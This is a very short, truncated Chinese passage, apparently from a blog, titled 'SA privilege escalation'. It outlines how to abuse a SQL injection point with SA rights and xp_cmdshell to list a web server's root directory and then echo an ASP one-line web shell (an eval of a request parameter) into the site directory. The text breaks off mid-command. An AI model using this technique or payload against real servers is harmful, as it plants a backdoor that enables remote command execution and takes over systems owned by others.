SA提权

不再关注网络安全

注入点是SA权限. xp_cmdshell是存在的. 找到网站主目录 dir d:\wwwroot 找到站点的目录后. Echo ^<%eval request("#")%>^...